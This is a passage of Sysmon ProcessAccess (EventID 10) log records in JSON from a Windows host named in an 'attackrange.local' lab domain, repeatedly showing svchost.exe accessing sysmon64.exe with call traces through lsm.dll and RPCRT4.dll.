C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:54.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 